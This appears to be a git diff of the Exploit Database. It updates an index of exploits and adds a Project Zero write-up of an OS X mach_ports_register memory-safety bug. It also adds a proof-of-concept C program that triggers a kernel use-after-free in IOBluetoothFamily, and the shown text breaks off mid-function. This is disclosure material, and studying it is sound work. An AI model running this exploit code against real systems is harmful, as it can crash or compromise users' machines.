+39936,platforms/php/webapps/39936.txt,"Joomla! Component 'com_payplans' 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 39937,platforms/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",php,webapps,80 39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0 39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow (PoC)",2016-06-13,HaHwul,linux,dos,0 @@ -36256,7 +36256,7 @@ id,file,description,date,author,platform,type,port 39950,platforms/php/webapps/39950.txt,"w2wiki - Multiple Cross-Site Scripting Vulnerabilities",2016-06-15,HaHwul,php,webapps,80 39951,platforms/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,hardware,webapps,80 39952,platforms/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,php,webapps,80 -39953,platforms/php/webapps/39953.txt,"Joomla! Component En Masse (com_enmasse) 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80 +39953,platforms/php/webapps/39953.txt,"Joomla! Component 'com_enmasse' 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",php,webapps,80 39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0 39955,platforms/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",php,webapps,80 39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80 @@ -36276,7 +36276,7 @@ id,file,description,date,author,platform,type,port 39974,platforms/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 -39977,platforms/php/webapps/39977.txt,"Joomla! Component BT Media (com_bt_media) - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 +39977,platforms/php/webapps/39977.txt,"Joomla! Component 'com_bt_media' - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 39978,platforms/php/webapps/39978.php,"Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80 39979,platforms/windows/shellcode/39979.c,"Windows XP < 10 - Download & Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0 39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0 @@ -36288,7 +36288,7 @@ id,file,description,date,author,platform,type,port 39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",linux,dos,0 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)",2016-06-21,s0nk3y,php,webapps,80 39988,platforms/php/webapps/39988.html,"Yona CMS - Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80 -39989,platforms/php/webapps/39989.txt,"Joomla! Component Publisher Pro (com_publisher) - SQL Injection",2016-06-21,s0nk3y,php,webapps,80 +39989,platforms/php/webapps/39989.txt,"Joomla! Component 'com_publisher' - SQL Injection",2016-06-21,s0nk3y,php,webapps,80 39990,platforms/windows/dos/39990.txt,"Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 39991,platforms/windows/dos/39991.txt,"Microsoft Windows - Kernel 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0 @@ -36298,8 +36298,8 @@ id,file,description,date,author,platform,type,port 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0 39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80 -40111,platforms/php/webapps/40111.txt,"Joomla! Component Guru Pro (com_guru) - SQL Injection",2016-07-14,s0nk3y,php,webapps,80 -39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21 +40111,platforms/php/webapps/40111.txt,"Joomla! Component 'com_guru' - SQL Injection",2016-07-14,s0nk3y,php,webapps,80 +39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21 40004,platforms/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,php,remote,80 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80 @@ -36510,9 +36510,9 @@ id,file,description,date,author,platform,type,port 40252,platforms/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0 40253,platforms/windows/dos/40253.html,"Microsoft Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0 40254,platforms/cgi/webapps/40254.txt,"SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure",2016-08-17,"Yakir Wizman",cgi,webapps,80 -40255,platforms/windows/dos/40255.txt,"Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 -40256,platforms/windows/dos/40256.txt,"Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 -40257,platforms/windows/dos/40257.txt,"Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 +40255,platforms/windows/dos/40255.txt,"Microsoft Windows - GDI+ DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 +40256,platforms/windows/dos/40256.txt,"Microsoft Windows - GDI+ ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 +40257,platforms/windows/dos/40257.txt,"Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)",2016-08-17,"Google Security Research",windows,dos,0 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40260,platforms/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80 @@ -36709,7 +36709,7 @@ id,file,description,date,author,platform,type,port 40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0 -40608,platforms/windows/local/40608.cs,"Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0 +40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0 40609,platforms/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471 40610,platforms/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099 40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0 @@ -36728,15 +36728,39 @@ id,file,description,date,author,platform,type,port 40631,platforms/php/webapps/40631.txt,"Boonex Dolphin 7.3.2 - Authentication Bypass",2016-10-26,"Saadi Siddiqui",php,webapps,0 40632,platforms/windows/dos/40632.py,"SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service",2016-10-26,ScrR1pTK1dd13,windows,dos,0 40633,platforms/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password Disclosure",2016-10-26,"Jason Doyle",hardware,remote,0 +40647,platforms/windows/dos/40647.py,"freeFTPd 1.0.8 - 'mkd' Command Denial Of Service",2016-10-31,ScrR1pTK1dd13,windows,dos,0 40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0 40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0 40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0 40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting",2016-10-28,LiquidWorm,php,webapps,0 40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0 40643,platforms/hardware/remote/40643.txt,"InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials",2016-10-28,LiquidWorm,hardware,remote,0 +40648,platforms/windows/dos/40648.txt,"Micro Focus Rumba 9.4 - Local Denial Of Service",2016-10-31,"Umit Aksu",windows,dos,0 40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 40635,platforms/windows/dos/40635.py,"uSQLite 1.0.0 - Denial Of Service",2016-10-27,"Peter Baris",windows,dos,0 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0 40637,platforms/php/webapps/40637.txt,"Joomla 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80 40638,platforms/windows/dos/40638.py,"CherryTree 0.36.9 - Memory Corruption (PoC)",2016-10-27,n30m1nd,windows,dos,0 +40649,platforms/windows/dos/40649.html,"Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow",2016-10-31,"Umit Aksu",windows,dos,0 +40650,platforms/php/webapps/40650.txt,"S9Y Serendipity 2.0.4 - Cross-Site Scripting",2016-10-31,Besim,php,webapps,0 +40651,platforms/windows/remote/40651.py,"Rumba FTP Client 4.x - Stack buffer overflow (SEH)",2016-10-31,"Umit Aksu",windows,remote,0 +40652,platforms/osx/dos/40652.c,"Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free",2016-10-31,"Google Security Research",osx,dos,0 +40653,platforms/osx/local/40653.txt,"OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local,0 +40654,platforms/multiple/dos/40654.txt,"OS X/iOS - mach_ports_register Multiple Memory Safety Issues",2016-10-31,"Google Security Research",multiple,dos,0 +40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0 +40656,platforms/windows/dos/40656.txt,"NVIDIA Driver - Escape Code Leaks Uninitialised ExAllocatePoolWithTag Memory to Userspace",2016-10-31,"Google Security Research",windows,dos,0 +40657,platforms/windows/dos/40657.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x700010d",2016-10-31,"Google Security Research",windows,dos,0 +40658,platforms/windows/dos/40658.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000194",2016-10-31,"Google Security Research",windows,dos,0 +40659,platforms/windows/dos/40659.txt,"NVIDIA Driver - Unchecked Write to User-Provided Pointer in Escape 0x600000D",2016-10-31,"Google Security Research",windows,dos,0 +40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0 +40661,platforms/windows/dos/40661.txt,"NVIDIA Driver - Escape 0x100010b Missing Bounds Check",2016-10-31,"Google Security Research",windows,dos,0 +40662,platforms/windows/dos/40662.txt,"NVIDIA Driver - No Bounds Checking in Escape 0x7000170",2016-10-31,"Google Security Research",windows,dos,0 +40663,platforms/windows/dos/40663.txt,"NVIDIA Driver - Unchecked User-Provided Pointer in Escape 0x5000027",2016-10-31,"Google Security Research",windows,dos,0 +40664,platforms/windows/dos/40664.txt,"NVIDIA Driver - Incorrect Bounds Check in Escape 0x70001b2",2016-10-31,"Google Security Research",windows,dos,0 +40665,platforms/windows/dos/40665.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x100009a",2016-10-31,"Google Security Research",windows,dos,0 +40666,platforms/windows/dos/40666.txt,"NVIDIA Driver - Missing Bounds Check in Escape 0x70000d5",2016-10-31,"Google Security Research",windows,dos,0 +40667,platforms/windows/dos/40667.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x7000014",2016-10-31,"Google Security Research",windows,dos,0 +40668,platforms/windows/dos/40668.txt,"NVIDIA Driver - Stack Buffer Overflow in Escape 0x10000e9",2016-10-31,"Google Security Research",windows,dos,0 +40669,platforms/osx/local/40669.txt,"MacOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",osx,local,0 +40670,platforms/windows/remote/40670.py,"PCMAN FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow",2016-10-31,ScrR1pTK1dd13,windows,remote,0 diff --git a/platforms/multiple/dos/40654.txt b/platforms/multiple/dos/40654.txt new file mode 100755 index 000000000..1d67e440b --- /dev/null +++ b/platforms/multiple/dos/40654.txt @@ -0,0 +1,94 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=882 + +mach_ports_register is a kernel task port MIG method. + +It's defined in MIG like this: + + routine mach_ports_register( + target_task : task_t; + init_port_set : mach_port_array_t = + ^array[] of mach_port_t); + +Looking at the generated code for this we notice something kinda weird; here's the mach message structure +which actually gets sent: + + typedef struct { + mach_msg_header_t Head; + // start of the kernel processed data + mach_msg_body_t msgh_body; + mach_msg_ool_ports_descriptor_t init_port_set; + // end of the kernel processed data + NDR_record_t NDR; + mach_msg_type_number_t init_port_setCnt; + } Request __attribute__((unused)); + +The message contains an OOL ports descriptor, which is expected, but also contains a separate init_port_setCnt value +even though the ool_ports_descriptor_t already has the correct length of the descriptor. + +When the kernel process this ool ports descriptor in ipc_kmsg_copyin_ool_ports_descriptor it will kalloc a buffer large enough +for all the ports and then copyin and convert them all. It does this using the init_port_set.count value, not init_port_setCnt. + +The generated MIG code however calls mach_ports_register like this: + + OutP->RetCode = mach_ports_register(target_task, (mach_port_array_t)(In0P->init_port_set.address), In0P->init_port_setCnt); + +without verifying that In0P->init_port_setCnt is equal to init_port_set.count. + +This means that when we reach mach_ports_register lots of stuff goes wrong: + + kern_return_t + mach_ports_register( + task_t task, + mach_port_array_t memory, <-- points to kalloc'ed buffer + mach_msg_type_number_t portsCnt) <-- completely controlled, not related to size of kalloc'ed buffer + { + ipc_port_t ports[TASK_PORT_REGISTER_MAX]; + unsigned int i; + + if ((task == TASK_NULL) || + (portsCnt > TASK_PORT_REGISTER_MAX) || + (portsCnt && memory == NULL)) + return KERN_INVALID_ARGUMENT; <-- portsCnt must be >=1 && <= 3 + + for (i = 0; i < portsCnt; i++) + ports[i] = memory[i]; <-- if we only sent one OOL port but set portsCnt >1 this will read a mach_port_t (a pointer) out of bounds + for (; i < TASK_PORT_REGISTER_MAX; i++) + ports[i] = IP_NULL; + + itk_lock(task); + if (task->itk_self == IP_NULL) { + itk_unlock(task); + return KERN_INVALID_ARGUMENT; + } + + for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) { + ipc_port_t old; + + old = task->itk_registered[i]; + task->itk_registered[i] = ports[i]; + ports[i] = old; + } + + itk_unlock(task); + + for (i = 0; i < TASK_PORT_REGISTER_MAX; i++) + if (IP_VALID(ports[i])) + ipc_port_release_send(ports[i]); <-- this can decrement the ref on a pointer which was read out of bounds if we call this function multiple times + + if (portsCnt != 0) + kfree(memory, + (vm_size_t) (portsCnt * sizeof(mach_port_t))); <-- this can call kfree with the wrong size + + return KERN_SUCCESS; + } + +For this PoC I've patched the MIG generated code to always only send one OOL mach port but still set init_port_setCnt to a controlled value - you should see a kernel +panic decrementing an invalid reference or something like that. + +This bug however could be exploited quite nicely to cause a mach_port_t UaF which could have all kinds of fun consequences (getting another task's task port for example!) + +tested on OS X 10.11.6 (15G31) on MacBookPro10,1 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40654.zip diff --git a/platforms/osx/dos/40652.c b/platforms/osx/dos/40652.c new file mode 100755 index 000000000..e41f7ba35 --- /dev/null +++ b/platforms/osx/dos/40652.c @@ -0,0 +1,413 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=830 + +When you create a new IOKit user client from userspace you call: + + kern_return_t IOServiceOpen( io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect ); + +The owningTask mach port gets converted into a task struct pointer by the MIG deserialization code which then takes +a reference on the task, calls is_io_service_open_extended passing the task struct then drops its reference. + +is_io_service_open_extended will then call through to any overriden newUserClient or initWithTask methods implemented +by the service. + +If those services want to keep a pointer to the "owningTask" then it's very important that they actually take a reference. + +We can actually pass any task port as the "owningTask" which means that if the userclient doesn't take a reference +we can easily pass the task port for another task, kill that task (freeing the task struct) then get the user client +to use the free'd task struct. + +IOBluetoothHCIUserClient (userclient type 0 of IOBluetoothHCIController) can be instantiated by a regular user +and stores a raw task struct pointer at this+0xe0 without taking a reference. + +This pointer is then used in IOBluetoothHCIUserClient::SimpleDispatchWL to build and manipulate IOMemoryDescriptors. + +This PoC forks off a child which sends the parent back its task port then spins. The parent then creates a new IOBluetoothHCIUserClient +passing the child's task port as the owningTask then sigkills the child (freeing it's task struct.) The parent then invokes +an external method on the user client leading to the UaF. + +The IOMemoryDescriptor code does sufficiently weird stuff with the task struct and the memory map hanging off it that +this bug is clearly exploitable as just a plain memory corruption issue but can probably be leveraged for more interesting +logic stuff too. + +Note that bluetooth does have to be turned on for this PoC to work! + +build: clang -o bluetooth_uaf bluetooth_uaf.c -framework IOKit + +You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics! + +tested on OS X 10.11.5 (15F34) on MacBookAir5,2 +*/ + +// ianbeer + +/* +OS X kernel use-after-free in IOBluetoothFamily.kext + +When you create a new IOKit user client from userspace you call: + + kern_return_t IOServiceOpen( io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect ); + +The owningTask mach port gets converted into a task struct pointer by the MIG deserialization code which then takes +a reference on the task, calls is_io_service_open_extended passing the task struct then drops its reference. + +is_io_service_open_extended will then call through to any overriden newUserClient or initWithTask methods implemented +by the service. + +If those services want to keep a pointer to the "owningTask" then it's very important that they actually take a reference. + +We can actually pass any task port as the "owningTask" which means that if the userclient doesn't take a reference +we can easily pass the task port for another task, kill that task (freeing the task struct) then get the user client +to use the free'd task struct. + +IOBluetoothHCIUserClient (userclient type 0 of IOBluetoothHCIController) can be instantiated by a regular user +and stores a raw task struct pointer at this+0xe0 without taking a reference. + +This pointer is then used in IOBluetoothHCIUserClient::SimpleDispatchWL to build and manipulate IOMemoryDescriptors. + +This PoC forks off a child which sends the parent back its task port then spins. The parent then creates a new IOBluetoothHCIUserClient +passing the child's task port as the owningTask then sigkills the child (freeing it's task struct.) The parent then invokes +an external method on the user client leading to the UaF. + +The IOMemoryDescriptor code does sufficiently weird stuff with the task struct and the memory map hanging off it that +this bug is clearly exploitable as just a plain memory corruption issue but can probably be leveraged for more interesting +logic stuff too. + +Note that bluetooth does have to be turned on for this PoC to work! + +build: clang -o bluetooth_uaf bluetooth_uaf.c -framework IOKit + +You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics! + +tested on OS X 10.11.5 (15F34) on MacBookAir5,2 +*/ + +#include +#include +#include +#include + +#include + +#include +#include +#include +#include +#include +#include + +#include +#include + + +#define MACH_ERR(str, err) do { \ + if (err != KERN_SUCCESS) { \ + mach_error("[-]" str "\n", err); \ + exit(EXIT_FAILURE); \ + } \ +} while(0) + +#define FAIL(str) do { \ + printf("[-] " str "\n"); \ + exit(EXIT_FAILURE); \ +} while (0) + +#define LOG(str) do { \ + printf("[+] " str"\n"); \ +} while (0) + +/*************** + * port dancer * + ***************/ + +// set up a shared mach port pair from a child process back to its parent without using launchd +// based on the idea outlined by Robert Sesek here: https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html + +// mach message for sending a port right +typedef struct { + mach_msg_header_t header; + mach_msg_body_t body; + mach_msg_port_descriptor_t port; +} port_msg_send_t; + +// mach message for receiving a port right +typedef struct { + mach_msg_header_t header; + mach_msg_body_t body; + mach_msg_port_descriptor_t port; + mach_msg_trailer_t trailer; +} port_msg_rcv_t; + +typedef struct { + mach_msg_header_t header; +} simple_msg_send_t; + +typedef struct { + mach_msg_header_t header; + mach_msg_trailer_t trailer; +} simple_msg_rcv_t; + +#define STOLEN_SPECIAL_PORT TASK_BOOTSTRAP_PORT + +// a copy in the parent of the stolen special port such that it can be restored +mach_port_t saved_special_port = MACH_PORT_NULL; + +// the shared port right in the parent +mach_port_t shared_port_parent = MACH_PORT_NULL; + +void setup_shared_port() { + kern_return_t err; + // get a send right to the port we're going to overwrite so that we can both + // restore it for ourselves and send it to our child + err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &saved_special_port); + MACH_ERR("saving original special port value", err); + + // allocate the shared port we want our child to have a send right to + err = mach_port_allocate(mach_task_self(), + MACH_PORT_RIGHT_RECEIVE, + &shared_port_parent); + + MACH_ERR("allocating shared port", err); + + // insert the send right + err = mach_port_insert_right(mach_task_self(), + shared_port_parent, + shared_port_parent, + MACH_MSG_TYPE_MAKE_SEND); + MACH_ERR("inserting MAKE_SEND into shared port", err); + + // stash the port in the STOLEN_SPECIAL_PORT slot such that the send right survives the fork + err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, shared_port_parent); + MACH_ERR("setting special port", err); +} + +mach_port_t recover_shared_port_child() { + kern_return_t err; + + // grab the shared port which our parent stashed somewhere in the special ports + mach_port_t shared_port_child = MACH_PORT_NULL; + err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &shared_port_child); + MACH_ERR("child getting stashed port", err); + + LOG("child got stashed port"); + + // say hello to our parent and send a reply port so it can send us back the special port to restore + + // allocate a reply port + mach_port_t reply_port; + err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port); + MACH_ERR("child allocating reply port", err); + + // send the reply port in a hello message + simple_msg_send_t msg = {0}; + + msg.header.msgh_size = sizeof(msg); + msg.header.msgh_local_port = reply_port; + msg.header.msgh_remote_port = shared_port_child; + + msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE); + + err = mach_msg_send(&msg.header); + MACH_ERR("child sending task port message", err); + + LOG("child sent hello message to parent over shared port"); + + // wait for a message on the reply port containing the stolen port to restore + port_msg_rcv_t stolen_port_msg = {0}; + err = mach_msg(&stolen_port_msg.header, MACH_RCV_MSG, 0, sizeof(stolen_port_msg), reply_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); + MACH_ERR("child receiving stolen port\n", err); + + // extract the port right from the message + mach_port_t stolen_port_to_restore = stolen_port_msg.port.name; + if (stolen_port_to_restore == MACH_PORT_NULL) { + FAIL("child received invalid stolen port to restore"); + } + + // restore the special port for the child + err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, stolen_port_to_restore); + MACH_ERR("child restoring special port", err); + + LOG("child restored stolen port"); + return shared_port_child; +} + +mach_port_t recover_shared_port_parent() { + kern_return_t err; + + // restore the special port for ourselves + err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, saved_special_port); + MACH_ERR("parent restoring special port", err); + + // wait for a message from the child on the shared port + simple_msg_rcv_t msg = {0}; + err = mach_msg(&msg.header, + MACH_RCV_MSG, + 0, + sizeof(msg), + shared_port_parent, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + MACH_ERR("parent receiving child hello message", err); + + LOG("parent received hello message from child"); + + // send the special port to our child over the hello message's reply port + port_msg_send_t special_port_msg = {0}; + + special_port_msg.header.msgh_size = sizeof(special_port_msg); + special_port_msg.header.msgh_local_port = MACH_PORT_NULL; + special_port_msg.header.msgh_remote_port = msg.header.msgh_remote_port; + special_port_msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg.header.msgh_bits), 0) | MACH_MSGH_BITS_COMPLEX; + special_port_msg.body.msgh_descriptor_count = 1; + + special_port_msg.port.name = saved_special_port; + special_port_msg.port.disposition = MACH_MSG_TYPE_COPY_SEND; + special_port_msg.port.type = MACH_MSG_PORT_DESCRIPTOR; + + err = mach_msg_send(&special_port_msg.header); + MACH_ERR("parent sending special port back to child", err); + + return shared_port_parent; +} + +/*** end of port dancer code ***/ + +void do_child(mach_port_t shared_port) { + kern_return_t err; + + // create a reply port to receive an ack that we should exec the target + mach_port_t reply_port; + err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port); + MACH_ERR("child allocating reply port", err); + + // send our task port to our parent over the shared port + port_msg_send_t msg = {0}; + + msg.header.msgh_size = sizeof(msg); + msg.header.msgh_local_port = reply_port; + msg.header.msgh_remote_port = shared_port; + msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) | MACH_MSGH_BITS_COMPLEX; + + msg.body.msgh_descriptor_count = 1; + + msg.port.name = mach_task_self(); + msg.port.disposition = MACH_MSG_TYPE_COPY_SEND; + msg.port.type = MACH_MSG_PORT_DESCRIPTOR; + + err = mach_msg_send(&msg.header); + MACH_ERR("child sending task port message", err); + + LOG("child sent task port back to parent"); + + // spin and let our parent kill us + while(1){;} +} + +mach_port_t do_parent(mach_port_t shared_port) { + kern_return_t err; + + // wait for our child to send us its task port + port_msg_rcv_t msg = {0}; + err = mach_msg(&msg.header, + MACH_RCV_MSG, + 0, + sizeof(msg), + shared_port, + MACH_MSG_TIMEOUT_NONE, + MACH_PORT_NULL); + MACH_ERR("parent receiving child task port message", err); + + mach_port_t child_task_port = msg.port.name; + if (child_task_port == MACH_PORT_NULL) { + FAIL("invalid child task port"); + } + + LOG("parent received child's task port"); + + return child_task_port; +} + +io_connect_t get_connection(mach_port_t task_port) { + kern_return_t err; + mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController")); + + if (service == MACH_PORT_NULL) { + printf("unable to get service\n"); + return MACH_PORT_NULL; + } + + io_connect_t conn = MACH_PORT_NULL; + + err = IOServiceOpen(service, task_port, 0, &conn); // 1 = IOBluetoothHCIUserClient + if (err != KERN_SUCCESS){ + printf("IOServiceOpen failed: %s\n", mach_error_string(err)); + conn = MACH_PORT_NULL; + } + IOObjectRelease(service); + + return conn; +} + +void trigger(int child_pid, mach_port_t child_task_port) { + kern_return_t err; + // get the userclient passing the child's task port + io_connect_t conn = get_connection(child_task_port); + if (conn == MACH_PORT_NULL){ + printf("unable to get 